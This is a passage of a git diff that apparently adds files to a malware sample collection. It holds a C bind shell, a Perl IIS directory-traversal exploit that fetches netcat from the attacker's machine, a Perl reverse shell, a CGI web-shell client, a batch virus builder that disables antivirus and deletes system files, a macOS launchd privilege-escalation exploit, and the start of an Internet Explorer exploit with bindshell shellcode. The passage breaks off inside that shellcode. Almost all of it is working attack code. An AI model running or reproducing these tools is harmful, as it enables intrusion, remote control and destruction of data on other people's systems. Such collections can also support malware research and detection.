+lfd=socket(AF_INET,SOCK_STREAM,0); +bzero(&serv,sizeof(serv)); +serv.sin_family=AF_INET; +serv.sin_addr.s_addr=htonl(INADDR_ANY); +serv.sin_port=htons(65535); +bind(lfd,(struct sockaddr *)&serv,sizeof(serv)); +listen(lfd,5); + +while(1) +{ +len=sizeof(cli); +cfd=accept(lfd,(struct sockaddr *)&cli,&len); + if(!(pid=fork())) + { + dup2(cfd,0); + dup2(cfd,1); + dup2(cfd,2); + execve(sh[0],sh,NULL); + close(cfd); + exit(0); + } +close(cfd); +} +return 0; +} + +void mk_daemon() +{ +/* yes I did get this out of UNP */ +int x; +pid_t pid; + if((pid=fork()) !=0) + { + exit(-1); + } +setsid(); +signal(SIGHUP,SIG_IGN); +signal(SIGINT,SIG_IGN); + + if((pid=fork()) !=0) + { + exit(-1); + } +chdir("/"); +umask(0); + for(x=0;x<=64;x++) + { + close(x); + } +} \ No newline at end of file diff --git a/Perl/Backdoor.Perl.WinShell.a b/Perl/Backdoor.Perl.WinShell.a new file mode 100644 index 00000000..94cde8ea --- /dev/null +++ b/Perl/Backdoor.Perl.WinShell.a @@ -0,0 +1,56 @@ +# This is for educational purpose's only! +# WHO LET THEM DOGS OUT! +# Use uni.pl first to see if this is a vulnerable server! +# Based of the script unicodeexecute.pl from Roelof Temmngh +# Files=uniexe.pl,uni.pl,readme.file,tftpd32.exe,exploit.readme + +use Socket; + +if ($#ARGV<0) {die "Usage: uniexe.pl IP:port command\n";} +($host,$port)=split(/:/,@ARGV[0]); +$target = inet_aton($host); + + +$failed=1; +$command="dir"; +@results=sendraw("GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+$command HTTP/1.0\r\n\r\n\cls"); +foreach $line (@results){ + if ($line =~ /nit.exe/) {$failed=0;} +} +$failed2=1; +if ($failed==1) { + + #You need to change the xxx.xxx.xxx.xxx to your ip address. Duh! + $command="tftp -i xxx.xxx.xxx.xxx GET ncx99.exe c:\\inetpub\\scripts\\nit.exe"; + $command=~s/ /\%20/g; + @results2=sendraw("GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+$command HTTP/1.0\r\n\r\n"); + foreach $line2 (@results2){ + if (($line2 =~ /nit.exe/ )) {$failed2=0;} + } +} + + +$command=@ARGV[1]; +print "\n +Hit CTRL-C if this is Hanging"; + +$command=~s/ /\%20/g; +my @results=sendraw("GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+$command HTTP/1.0\r\n\r\n"); +print @results; + +# ------------- Sendraw - thanx RFP rfp@wiretrip.net +sub sendraw { # this saves the whole transaction anyway + my ($pstr)=@_; + socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||2) || + die("Socket problems\n"); + if(connect(S,pack "SnA4x8",2,$port,$target)){ + my @in; + select(S); $|=1; print $pstr; + while(<S>){ push @in, $_;} + select(STDOUT); close(S); return @in; + } else { die("Can't connect...\n"); } + +} +# NIT IN THE YEAR 2000 + + diff --git a/Perl/Backdoor.Perl.Worsyn b/Perl/Backdoor.Perl.Worsyn new file mode 100644 index 00000000..33ada973 --- /dev/null +++ b/Perl/Backdoor.Perl.Worsyn @@ -0,0 +1,45 @@ + +use Socket; + +print "Data Cha0s Connect Back Backdoor\n\n"; + +if (!$ARGV[0]) { + printf "Usage: $0 [Host] <Port>\n"; + exit(1); +} + +print "[*] Dumping Arguments\n"; + +$host = $ARGV[0]; +$port = 80; + +if ($ARGV[1]) { + $port = $ARGV[1]; +} + +print "[*] Connecting...\n"; + +$proto = getprotobyname('tcp') || die("[-] Unknown Protocol\n"); + +socket(SERVER, PF_INET, SOCK_STREAM, $proto) || die ("[-] Socket Error\n"); + +my $target = inet_aton($host); + +if (!connect(SERVER, pack "SnA4x8", 2, $port, $target)) { + die("[-] Unable to Connect\n"); +} + +print "[*] Spawning Shell\n"; + +if (!fork( )) { + open(STDIN,">&SERVER"); + open(STDOUT,">&SERVER"); + open(STDERR,">&SERVER"); + + exec {'/bin/sh'} '-bash' . "\0" x 4; + exit(0); +} + +print "[*] Detached\n\n"; + + diff --git a/Perl/Backdoor.Perl.Wsh.10 b/Perl/Backdoor.Perl.Wsh.10 new file mode 100644 index 00000000..13744c48 --- /dev/null +++ b/Perl/Backdoor.Perl.Wsh.10 @@ -0,0 +1,192 @@ +# wsh-c - cgi based remote unix shell (client part) +# by Alex Dyatlov <alex@dyatlov.ru> +# April, 2002 +# +# INSTALL +# Module Term::ReadLine::Gnu installation is recommended, get: +# 1) readline-4.2a.tar.gz or later from +# http://www.gnu.org/directory/readline.html +# 2) ReadLine-Gnu-1.12.tar.gz or later from +# http://search.cpan.org/search?dist=Term-ReadLine-Gnu +# +# SHELL COMMANDS +# exit as is +# history show commands history +# !<number> execute command with history <number> +# wshget <file> get <file> from remote host to local directory +# wshput <file> put <file> from local directory to remote host +use strict; + +use IO::Socket; +use Term::ReadLine; +use POSIX qw(:sys_wait_h); + +#--- config - begin ----------------------------------->8-- +my $use_proxy = 1; #--- (0 || 1) connect directly or use HTTP proxy +my $host = "111.222.33.4"; #--- proxy ip here if $use_proxy = 1 +my $port = 3128; #--- proxy port +my $http_port = 80; #--- default HTTP port +my $agent = "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"; #--- for httpd logs +my $anticache = 0; #--- (0 || 1) add '?<random_number>' to URL + +my $shell_prompt = "wsh#"; +my $pwd = "/"; #--- 'home' directory on remote host +my $pattern = "STCOM"; +#--- config - end ------------------------------------->8-- + +my $VERSION = "1.0"; +$ENV{PERL_RL} = " o=0"; # use best available ReadLine without ornaments + +my $request = $ARGV[0]; +my $shtam = $ARGV[1]; +unless ($request && $shtam) { + print "Usage: $0 host/dir/script KEY\n\n"; + exit -1; +} + +my $hostname; +if ($request =~ /^([^\/]+)(.*)/s) { + $hostname = $1; + $request = $2 + if (!$use_proxy); + if ($hostname =~ /([^:]+):(.*)/) { + $hostname = $1; + $http_port = $2; + } +} else { + print "unable to parse hostname from $ARGV[0]\n\n"; + exit -1; +} +if (!$use_proxy) { + if ($hostname !~ /\d+\.\d+\.\d+\.\d+/) { + (my $name, my $aliases, my $addrtype, my $length, my @addrs) = + gethostbyname($hostname) + or die "unable to resolve hostname '$hostname'\n\n"; + $host = join('.', unpack('C4', $addrs[0])); + } else { + $host = $hostname; + } + $port = $http_port; +} else { + $request = "http://".$request; +} + +my $term = Term::ReadLine->new("wsh"); +my $OUT = $term->OUT() || *STDOUT; +my @h_list = (); +my $io; +my $file; +while (defined (my $cmd = $term->readline("$shell_prompt "))) { + next if (length($cmd) == 0); +# wsh commands --- begin + exit 0 if ($cmd =~ /^exit$/s); + if ($cmd =~ /^history$/s) { + my $h_counter = 1; + foreach (@h_list) { + print $OUT " ".($h_counter++)."\t$_\n"; + } + next; + } + if ($cmd =~ /^\!(\d+)$/s) { + ($1 > 0 && $1 <= scalar(@h_list)) ? + $cmd = $h_list[$1-1] : + next; + } + $io = undef; + if ($cmd =~ /^wsh((get)|(put)) ['" ]*?([^'"]+)/s) { + $io = $1; + $file = $4; + ($pwd =~ /\/$/s) ? + $cmd = "wsh$io \"$pwd$file\"" : + $cmd = "wsh$io \"$pwd/$file\""; + if ($io =~ /put/) { + unless (open(FH, $file)) { + print "$file: $!\n"; + next; + } + $cmd = join(//, ($cmd, <FH>)); + close(FH); + } + } +# wsh commands --- end + push(@h_list, $cmd); + if ($cmd =~ /^cd ['"]?([^'"; ]+)$/s) { + my $dir = $1; + if ($dir !~ /^\//s) { + $pwd = "$pwd/$dir"; + $pwd =~ s/[^\/]+\/\.\.//g; + $pwd =~ s/\/{2,}/\//g; + $pwd =~ s/\/$//; + } else { + $pwd = $dir; + } + next; + } + $cmd = "if [ -d $pwd ];then cd $pwd;". + "else echo 'cd: $pwd: No such file or directory';exit 0;fi;$cmd" + unless (defined($io)); + my $cmd_s = $pattern; + $cmd_s =~ s/ST/$shtam/; + $cmd_s =~ s/COM/$cmd/; + my $cmd_sl = length($cmd_s); + my $socket = IO::Socket::INET->new( + PeerAddr => $host, + PeerPort => $port, + Proto => "tcp", + Type => SOCK_STREAM) or die $!; + ($anticache) ? + print $socket "POST $request?".(int(rand(9999)))." HTTP/1.0\r\n" : + print $socket "POST $request HTTP/1.0\r\n"; + print $socket + "Content-Type: application/x-www-form-urlencoded\r\n". + "User-Agent: $agent\r\n". + "Host: $hostname\r\n". + "Content-Length: $cmd_sl\r\n"; + ($use_proxy) ? + print $socket + "Proxy-Connection: close\r\n". + "Pragma: no-cache\r\n" : + print $socket + "Connection: close\r\n"; + print $socket + "\r\n". + "$cmd_s"; + my $cl = 0; + my $crlf = 0; + my @msg = (); + while (my $str = <$socket>) { + if (!$crlf && $str =~ /^\s*?$/s) { + $crlf = 1; + next; + } + $msg[$crlf] = $msg[$crlf].$str; + if (!$cl && $crlf) { + $cl = length($msg[0]) + 4; + if ($msg[0] =~ /Content-Length: (\d+)/s) { + $cl += $1; + } else { + $cl = -1; + } + } + last if ($cl > 0 && length($msg[0].$msg[1])+4 >= $cl); + } + close($socket); + if ($msg[0] !~ /^[^ ]+ 200/s) { + print $OUT "HTTP request fail:\n\n$msg[0]\n"; + next; + } + if ($io =~ /get/) { + if (length($msg[1]) > 0) { + if (open(FH, "> $file")) { + print FH $msg[1]; + close(FH); + } else { + print $OUT $!; + } + } else { + print $OUT "wshget fail\n" + } + } else { + print $OUT $msg[1]; + } +} diff --git a/Perl/Constructor.Perl.DAV.a b/Perl/Constructor.Perl.DAV.a new file mode 100644 index 00000000..1320ae7b --- /dev/null +++ b/Perl/Constructor.Perl.DAV.a @@ -0,0 +1,244 @@ +# Virus Builder +# by dav +$vname = ''; +$vwriter = ''; +$vbsmsgtxt = ''; +$vtime = ''; + +print("*******************\n"); +print("DAV's Virus Builder\n"); +print("BAT/VIRUS\n"); +print("*******************\n"); +print("\n"); + +print("VirusName?\n"); + chomp ($vname = <STDIN>); + print("\n"); +print("Author?\n"); + chomp ($vwriter = <STDIN>); + print("\n"); + open(FH,">virus.bat"); + print FH '@echo off'; + print FH "\n"; + close(FH); + open(FH,">>virus.bat"); + print FH "rem $vname - Virus\n"; + print FH "rem by $vwriter\n"; + print FH "rem ** generated with dav's virus builder v.1.0 in perl **\n"; + print FH "set dav=echo\n"; + print FH "set davv=copy\n"; + print FH "set davvv=reg add\n"; + print FH "set davvvv=del\n"; + print FH "set davvvvv=net share\n"; + print FH "set davvvvvv=cls\n"; + print FH "set davvvvvvv=taskkill\n"; + print FH "set davvvvvvvv=ren\n"; + print FH "set davvvvvvvvv=call\n"; + print FH "set davvvvvvvvvv=shutdown\n"; + print FH "%davv% %0 %windir%\\vwin.bat > nul"; + print FH "\n"; + close(FH); + +print("*** Startup Methods ***\n"); + + print("Autostart/Startup Infect - yes/no?\n"); + chomp ($vstartup = <STDIN>); + if($vstartup=~m/^(yes|ja|j|y)/i) { + open(FH,">>virus.bat"); + print FH "chcp 1252 > nul"; + print FH "\n"; + print FH '%davv% %0 "C:\\Dokumente und Einstellungen\\All Users\\Startmen№\\Programme\\Autostart\\win.bat" > nul'; + print FH "\n"; + print FH '%davv% %0 "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\win.bat" > nul'; + print FH "\n"; + close(FH); } else { print "x\n" } + print("\n"); + + print("REGentry(works on all winsys) - yes/no?\n"); + chomp ($regy = <STDIN>); + if($regy=~m/^(yes|ja|j|y)/i) { + open(FH,">>virus.bat"); + print FH '%davvv% "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v vwin /t REG_SZ /d "%windir%\vwin.bat" /f > nul'; + print FH "\n"; + print FH '%davvv% "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v vwin /t REG_SZ /d "%windir%\vwin.bat" /f > nul'; + print FH "\n"; + close(FH); } else { print "x\n" } + print("\n"); + +print("*** Virus Main Function ***\n"); + + print("Shutdown with time and comment - yes/no?\n"); + chomp ($shutdown = <STDIN>); + if($shutdown=~m/^(yes|ja|j|y)/i) { + print("Seconds to restart?\n"); + chomp ($vtime = <STDIN>); + print("Comment?\n"); + chomp ($vcom = <STDIN>); + open(FH,">>virus.bat"); + print FH "%davvvvvvvvvv% /s /f /t "; + print FH "$vtime"; + print FH " "; + print FH "/c "; + print FH '"'; + print FH "$vcom"; + print FH '"'; + print FH "\n"; + close(FH); } else { print "x\n" } + print("\n"); + + print("LSASS.exe and EXPLORER.exe Killer - yes/no?\n"); + chomp ($lsass = <STDIN>); + if($lsass=~m/^(yes|ja|j|y)/i) { + open(FH,">>virus.bat"); + print FH "%davvvvvvv% /f /im explorer.exe\n"; + print FH "%davvvvvvv% /f /im lsass.exe \n"; + close(FH); } else { print "x\n" } + print("\n"); + + print("Net Share c:, g: ... - yes/no?\n"); + chomp ($netshare = <STDIN>); + if($netshare=~m/^(yes|ja|j|y)/i) { + open(FH,">>virus.bat"); + print FH "%davvvvv% c=c:\n"; + print FH "%davvvvv% g=g:\n"; + print FH "%davvvvv% f=f:\n"; + print FH "%davvvvv% y=y:\n"; + close(FH); } else { print "x\n" } + print("\n"); + + print("kill cookies - yes/no?\n"); + chomp ($vcookie = <STDIN>); + if($vcookie=~m/^(yes|ja|j|y)/i) { + open(FH,">>virus.bat"); + print FH '%davvvvvvvv% "c:\documents and settings\%username%\cookies\*.txt" *.fUcKeDbYvIrUs > nul'; + print FH "\n"; + print FH '%davvvvvvvv% "C:\Dokumente und Einstellungen\%username%\cookies\*.txt" *.fUcKeDbYvIrUs > nul'; + print FH "\n"; + close(FH); } else { print "x\n" } + print("\n"); + + print("infect hosts file - yes/no?\n"); + chomp ($vhosts = <STDIN>); + if($vhosts=~m/^(yes|ja|j|y)/i) { + open(FH,">>virus.bat"); + print FH "%dav% 127.0.0.1 www.google.de >> %windir%\\system32\\drivers\\etc\\hosts\n"; + print FH "%dav% 127.0.0.1 www.google.com >> %windir%\\system32\\drivers\\etc\\hosts\n"; + print FH "%dav% 127.0.0.1 www.symantec.de >> %windir%\\system32\\drivers\\etc\\hosts\n"; + print FH "%dav% 127.0.0.1 www.antivir.de >> %windir%\\system32\\drivers\\etc\\hosts\n"; + print FH "%dav% 127.0.0.1 www.f-secure.com >> %windir%\\system32\\drivers\\etc\\hosts\n"; + print FH "%dav% 127.0.0.1 www.f-secure.de >> %windir%\\system32\\drivers\\etc\\hosts\n"; + print FH "%dav% 127.0.0.1 www.kaspersky.com >> %windir%\\system32\\drivers\\etc\\hosts\n"; + print FH "%dav% 127.0.0.1 www.kaspersky.de >> %windir%\\system32\\drivers\\etc\\hosts\n"; + print FH "%dav% 127.0.0.1 www.nai.com >> %windir%\\system32\\drivers\\etc\\hosts\n"; + print FH "%dav% 127.0.0.1 windowsupdate.microsoft.com >> %windir%\\system32\\drivers\\etc\\hosts\n"; + print FH "%dav% 127.0.0.1 www.symantec.com >> %windir%\\system32\\drivers\\etc\\hosts\n"; + print FH "%dav% 127.0.0.1 www.microsoft.de >> %windir%\\system32\\drivers\\etc\\hosts\n"; + print FH "%dav% 127.0.0.1 www.microsoft.com >> %windir%\\system32\\drivers\\etc\\hosts\n"; + print FH "%dav% 127.0.0.1 www.free-av.com >> %windir%\\system32\\drivers\\etc\\hosts\n"; + print FH "%dav% 127.0.0.1 www.sophos.com >> %windir%\\system32\\drivers\\etc\\hosts\n"; + print FH "%dav% 127.0.0.1 www.sophos.de >> %windir%\\system32\\drivers\\etc\\hosts\n"; + print FH "%davvvvvv%\n"; + close(FH); } else { print "x\n" } + print("\n"); + + print("Random Population - yes/no?\n"); + chomp ($ranpop = <STDIN>); + if($ranpop=~m/^(yes|ja|j|y)/i) { + open(FH,">>virus.bat"); + print FH "%davv% %0 %random%.bat\n"; + print FH "%davv% %0 %random%.bat\n"; + print FH "%davv% %0 %random%.bat\n"; + print FH "%davv% %0 %random%.bat\n"; + print FH "%davv% %0 c:\\%random%.bat\n"; + print FH "%davv% %0 c:\\%random%.bat\n"; + print FH "%davv% %0 c:\\%random%.bat\n"; + print FH "%davv% %0 c:\\%random%.bat\n"; + print FH "%davvvvvv%\n"; + print FH '%davv% %0 "C:\\Dokumente und Einstellungen\\All Users\\Startmen№\\Programme\\Autostart\\%random%.bat" > nul'; + print FH "\n"; + print FH '%davv% %0 "C:\\Dokumente und Einstellungen\\All Users\\Startmen№\\Programme\\Autostart\\%random%.bat" > nul'; + print FH "\n"; + print FH '%davv% %0 "C:\\Dokumente und Einstellungen\\All Users\\Startmen№\\Programme\\Autostart\\%random%.bat" > nul'; + print FH "\n"; + print FH '%davv% %0 "C:\\Dokumente und Einstellungen\\All Users\\Startmen№\\Programme\\Autostart\\%random%.bat" > nul'; + print FH "\n"; + print FH '%davv% %0 "C:\\Dokumente und Einstellungen\\All Users\\Startmen№\\%random%.bat" > nul'; + print FH "\n"; + print FH '%davv% %0 "C:\\Dokumente und Einstellungen\\All Users\\Startmen№\\%random%.bat" > nul'; + print FH "\n"; + print FH '%davv% %0 "C:\\Dokumente und Einstellungen\\All Users\\Startmen№\\%random%.bat" > nul'; + print FH "\n"; + print FH '%davv% %0 "C:\\Dokumente und Einstellungen\\All Users\\Startmen№\\%random%.bat" > nul'; + print FH "\n"; + print FH '%davv% %0 "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\%random%.bat" > nul'; + print FH "\n"; + print FH '%davv% %0 "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\%random%.bat" > nul'; + print FH "\n"; + print FH '%davv% %0 "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\%random%.bat" > nul'; + print FH "\n"; + print FH '%davv% %0 "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\%random%.bat" > nul'; + print FH "\n"; + print FH '%davv% %0 "C:\\Documents and Settings\\All Users\\Start Menu\\%random%.bat" > nul'; + print FH "\n"; + print FH '%davv% %0 "C:\\Documents and Settings\\All Users\\Start Menu\\%random%.bat" > nul'; + print FH "\n"; + print FH '%davv% %0 "C:\\Documents and Settings\\All Users\\Start Menu\\%random%.bat" > nul'; + print FH "\n"; + print FH '%davv% %0 "C:\\Documents and Settings\\All Users\\Start Menu\\%random%.bat" > nul'; + print FH "\n"; + close(FH); } else { print "x\n" } + print("\n"); + + print("infect some .exe files - yes/no?\n"); + chomp ($syskiller = <STDIN>); + if($syskiller=~m/^(yes|ja|j|y)/i) { + open(FH,">>virus.bat"); + print FH '%davv% %0 %windir%\\system32\\taskmgr.exe > nul'; + print FH "\n"; + print FH '%davv% %0 %windir%\\system32\\winlogon.exe > nul'; + print FH "\n"; + print FH '%davv% %0 %windir%\\system32\\svchost.exe > nul'; + print FH "\n"; + print FH '%davv% %0 %windir%\\system32\\calc.exe > nul'; + print FH "\n"; + close(FH); } else { print "x\n" } + print("\n"); + + print("kill .dll .ini files (** WARNING! **) - yes/no?\n"); + chomp ($syskiller1 = <STDIN>); + if($syskiller1=~m/^(yes|ja|j|y)/i) { + open(FH,">>virus.bat"); + print FH '%davvvvvvvv% %0 %windir%\\system32\\*.dll *.-fUcKeD > nul'; + print FH "\n"; + print FH '%davvvvvvvv% %0 %windir%\\system32\\*.ini *.FuCkEd- > nul'; + print FH "\n"; + close(FH); } else { print "x\n" } + print("\n"); + + print("VBS Messagebox - yes/no?\n"); + chomp ($vbsmsg = <STDIN>); + if($vbsmsg=~m/^(yes|ja|j|y)/i) { + print("Message?\n"); + chomp ($vbsmsgtxt = <STDIN>); + open(FH,">>virus.bat"); + print FH '%dav% MsgBox "'; + print FH "$vbsmsgtxt"; + print FH '", 16, "ViRuS!!!" > msg.vbs'; + print FH "\n"; + print FH "%davvvvvvvvv% msg.vbs\n"; + close(FH); } else { print "x\n" } + print("\n"); + + open(FH,">>virus.bat"); + print FH "goto ende\n"; + print FH ":ende\n"; + close(FH); + print("\n"); + + while ($cya ne 'exit') { + print "*** VIRUS.BAT BUILT ***\n"; + print "*** DON'T SPREAD YOUR VIRUS. ***\n"; + print "*** I AM NOT RESPONSIBLE FOR POSSIBLE DAMAGES OR SOMETHING ELSE. ***\n"; + print "*** exit to quit ***\n"; + chomp ($cya = <STDIN>); + print "\n"; } \ No newline at end of file diff --git a/Perl/Constructor.Perl.Machd.a b/Perl/Constructor.Perl.Machd.a new file mode 100644 index 00000000..723119fe --- /dev/null +++ b/Perl/Constructor.Perl.Machd.a @@ -0,0 +1,126 @@ +# http://www.digitalmunition.com/FailureToLaunch.pl +# Code by Kevin Finisterre kf_lists[at]digitalmunition[dot]com +# +# This is a practical application of Non Executable Stack Lovin - http://www.digitalmunition.com/NonExecutableLovin.txt +# +# This code currently jumps into 0x1811111 via dyld_stub_close() +# +# This exploit will create a malicious .plist file for you to use with launchctl +# k-fs-computer:~ kf$ launchctl load ./com.pwnage.plist +# +# In theory I guess you could also drop this in ~/Library/LaunchAgents +# +# This was tested against OSX 10.4.6 8l1119 on a 1.5GHz Intel Core Solo +# +# k-fs-computer:~ kf$ ls -al /sbin/launchd +# -rwsr-sr-x 1 root wheel 161944 Feb 19 04:46 /sbin/launchd +# k-fs-computer:~ kf$ file /sbin/launchd +# /sbin/launchd: setuid setgid Mach-O universal binary with 2 architectures +# /sbin/launchd (for architecture i386): Mach-O executable i386 +# /sbin/launchd (for architecture ppc): Mach-O executable ppc +# +# ./src/SystemStarter.c:374: syslog(level, buf); +# proactive security eh? + +foreach $key (keys %ENV) { + + delete $ENV{$key}; + +} + +$writeaddr = 0xa0011163; # close() +#$writeaddr = 0xa00119f1; # cxa_finalize() (must wait 25 seconds or so if you use this one) + +$sc = (0x1811111); + +# both of these arrays are put in size order due to the multiple writes via unformatted syslog() call + +# seteuid after thought... whoops...I had to move some shit arround to account for this +@seteuid = +([$sc+2, $sc+4, $sc, $sc+6], + [0x5050, 0xb7b0, 0xc031, 0x80cd], ); + +# Write the following instructions to 0xa0011163 <dyld_stub_close> as well as nemos execve() to 0x1811111 +# mov $0x1811111,%eax +# jmp *%eax +# +@payload = +([$writeaddr+6, $writeaddr, $sc+12, $sc+16, $sc+28, $sc+22, $sc+26, $sc+24, $sc+10, $sc+14, $sc+18, $sc+30, $writeaddr+2, $sc+20, $sc+8, $writeaddr+4], # 0 + [0x00e0, 0x11b8, 0x2f2f, 0x2f68, 0x3bb0, 0x50e3, 0x5353, 0x5454, 0x6850, 0x6873, 0x6d74, 0x80cd, 0x8111, 0x8970, 0xc031, 0xff01], ); + +$ENV{"TERM_PROGRAM"} = "." . +# string of write address +pack('l', $payload[0][0]) . pack('l', $payload[0][1]) . pack('l', $payload[0][2]) . pack('l', $payload[0][3]) . pack('l', $payload[0][4]) . pack('l', $payload[0][5]) . pack('l', $payload[0][6]) . pack('l', $payload[0][7]) . pack('l', $payload[0][8]) . pack('l', $payload[0][9]) . pack('l', $payload[0][10]) . pack('l', $payload[0][11]) . pack('l', $payload[0][12]) . pack('l', $payload[0][13]) . pack('l', $payload[0][14]) . pack('l', $payload[0][15]) . pack('l', $seteuid[0][0]) . pack('l', $seteuid[0][1]) . pack('l', $seteuid[0][2]) . pack('l', $seteuid[0][3]) ; + +# lazy non looped length calculations +$pay1 = $payload[1][0]; +$pay2 = ($payload[1][1] - $pay1 - 0x1 ); +$pay3 = ($payload[1][2] - $pay1 - $pay2 - 0x1); +$pay4 = ($payload[1][3] - $pay1 - $pay2 - $pay3 - 0x1); +$pay5 = ($payload[1][4] - $pay1 - $pay2 - $pay3 - $pay4 - 0x1); +$pay6 = ($payload[1][5] - $pay1 - $pay2 - $pay3 - $pay4 - $pay5 - 0x1); +$pay7 = ($payload[1][6] - $pay1 - $pay2 - $pay3 - $pay4 - $pay5 - $pay6 - 0x1); +$pay8 = ($payload[1][7] - $pay1 - $pay2 - $pay3 - $pay4 - $pay5 - $pay6 - $pay7 - 0x1); +$pay9 = ($payload[1][8] - $pay1 - $pay2 - $pay3 - $pay4 - $pay5 - $pay6 - $pay7 - $pay8 - 0x1); +$pay10 = ($payload[1][9] - $pay1 - $pay2 - $pay3 - $pay4 - $pay5 - $pay6 - $pay7 - $pay8 - $pay9 - 0x1); +$pay11 = ($payload[1][10] - $pay1 - $pay2 - $pay3 - $pay4 - $pay5 - $pay6 - $pay7 - $pay8 - $pay9 - $pay10 - 0x1); +$pay12 = ($payload[1][11] - $pay1 - $pay2 - $pay3 - $pay4 - $pay5 - $pay6 - $pay7 - $pay8 - $pay9 - $pay10 - $pay11 - 0x1); +$pay13 = ($payload[1][12] - $pay1 - $pay2 - $pay3 - $pay4 - $pay5 - $pay6 - $pay7 - $pay8 - $pay9 - $pay10 - $pay11 - $pay12 - 0x2); +$pay14 = ($payload[1][13] - $pay1 - $pay2 - $pay3 - $pay4 - $pay5 - $pay6 - $pay7 - $pay8 - $pay9 - $pay10 - $pay11 - $pay12 - $pay13 - 0x2); +$pay15 = ($payload[1][14] - $pay1 - $pay2 - $pay3 - $pay4 - $pay5 - $pay6 - $pay7 - $pay8 - $pay9 - $pay10 - $pay11 - $pay12 - $pay13 - $pay14 - 0x2); +$pay16 = ($payload[1][15] - $pay1 - $pay2 - $pay3 - $pay4 - $pay5 - $pay6 - $pay7 - $pay8 - $pay9 - $pay10 - $pay11 - $pay12 - $pay13 - $pay14 - $pay15 - 0x3); +# seems I forgot the seteuid(0) +$pay17 = 0xff + $seteuid[1][0]; +$pay18 = 0xff + ($seteuid[1][1] - $pay17); +$pay19 = 0xff + ($seteuid[1][2] - $pay17 - $pay18 ) ; +$pay20 = 0xff + ($seteuid[1][3] - $pay17 - $pay18 - $pay19 - 0x7ec8 - 0x270) ; # Something is fucking this write up... subtracting 0x8138 seems to help + +# The offset is off by 6 if you are trying to debug this in gdb +$format = +"%." . $pay1 . "d" . "%246\$hn" . +"%." . $pay2 . "d" . "%247\$hn" . +"%." . $pay3 . "d" . "%248\$hn" . +"%." . $pay4 . "d" . "%249\$hn" . +"%." . $pay5 . "d" . "%250\$hn" . +"%." . $pay6 . "d" . "%251\$hn" . +"%." . $pay7 . "d" . "%252\$hn" . +"%." . $pay8 . "d" . "%253\$hn" . +"%." . $pay9 . "d" . "%254\$hn" . +"%." . $pay10 . "d" . "%255\$hn" . +"%." . $pay11 . "d" . "%256\$hn" . +"%." . $pay12 . "d" . "%257\$hn" . +"%." . $pay13 . "d" . "%258\$hn" . +"%." . $pay14 . "d" . "%259\$hn" . +"%." . $pay15 . "d" . "%260\$hn" . +"%." . $pay16 . "d" . "%261\$hn" . +"%." . $pay17 . "d" . "%262\$hn" . +"%." . $pay18 . "d" . "%263\$hn" . +"%." . $pay19 . "d" . "%264\$hn" . +"%." . $pay20 . "d" . "%265\$hn" ; + +open(SUSH,">/tmp/aaa.c"); +printf SUSH "int main(){setuid(0);setgid(0);system(\"/bin/sh\");}\n"; +system("PATH=$PATH:/usr/bin/ cc -o /tmp/sh /tmp/aaa.c"); + +open(PWNED,">com.pwnage.plist"); + +print PWNED "<?xml version=\"1.0\" encoding=\"UTF-8\"?> +<!DOCTYPE plist PUBLIC \"-//Apple Computer//DTD PLIST 1.0//EN\" \"http://www.apple.com/DTDs/PropertyList-1.0.dtd\"> +<plist version=\"1.0\"> +<dict> + <key>Label</key> + <string>" . "$format" . + "</string> + <key>ProgramArguments</key> + <array> + <string>http://www.digitalmunition.com</string> + </array> + <key>RunAtLoad</key> + <true/> +</dict> +</plist>\n"; + +print "open a new window and type - \"launchctl load ./com.pwnage.plist\"\n"; +system("/sbin/launchd"); + + diff --git a/Perl/Constructor.Perl.Msdds.a b/Perl/Constructor.Perl.Msdds.a new file mode 100644 index 00000000..6b64b1cb --- /dev/null +++ b/Perl/Constructor.Perl.Msdds.a @@ -0,0 +1,80 @@ +####################################################### +# +# Microsoft Internet Explorer "Msdds.dll" Remote Code Execution Exploit (0day) +# +# Bindshell on port 28876 - Vulnerability discovered and exploited by Anonymous +# +# PoC code ripped from Berend-Jan Wever's Internet-Exploiter +# +# Vulnerable : EC444CB6-3E7E-4865-B1C3-0DE72EF39B3F (Msdds.dll) +# +# Tested on : Microsoft Internet Explorer 6 SP2 (Windows XP SP2) +# +# Code usage : perl IE-Msddsdll-0day.pl > mypage.html +# +####################################################### +# +# This program is free software; you can redistribute it and/or modify it under +# the terms of the GNU General Public License version 2, 1991 as published by +# the Free Software Foundation. +# +# This program is distributed in the hope that it will be useful, but WITHOUT +# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS +# FOR A PARTICULAR PURPOSE. See the GNU General Public License for more +# details. +# +# A copy of the GNU General Public License can be found at: +# http://www.gnu.org/licenses/gpl.html +# or you can write to: +# Free Software Foundation, Inc. +# 59 Temple Place - Suite 330 +# Boston, MA 02111-1307 +# USA. +# +####################################################### + +# header +my $header = "<html><body>\n<SCRIPT language=\"javascript\">\n"; + +# Win32 bindshell (port 28876) - SkyLined +my $shellcode = "shellcode = unescape(\"%u4343\"+\"%u4343\"+\"%u43eb". +"%u5756%u458b%u8b3c%u0554%u0178%u52ea%u528b%u0120%u31ea". +"%u31c0%u41c9%u348b%u018a%u31ee%uc1ff%u13cf%u01ac%u85c7". +"%u75c0%u39f6%u75df%u5aea%u5a8b%u0124%u66eb%u0c8b%u8b4b". +"%u1c5a%ueb01%u048b%u018b%u5fe8%uff5e%ufce0%uc031%u8b64". +"%u3040%u408b%u8b0c%u1c70%u8bad%u0868%uc031%ub866%u6c6c". +"%u6850%u3233%u642e%u7768%u3273%u545f%u71bb%ue8a7%ue8fe". +"%uff90%uffff%uef89%uc589%uc481%ufe70%uffff%u3154%ufec0". +"%u40c4%ubb50%u7d22%u7dab%u75e8%uffff%u31ff%u50c0%u5050". +"%u4050%u4050%ubb50%u55a6%u7934%u61e8%uffff%u89ff%u31c6". +"%u50c0%u3550%u0102%ucc70%uccfe%u8950%u50e0%u106a%u5650". 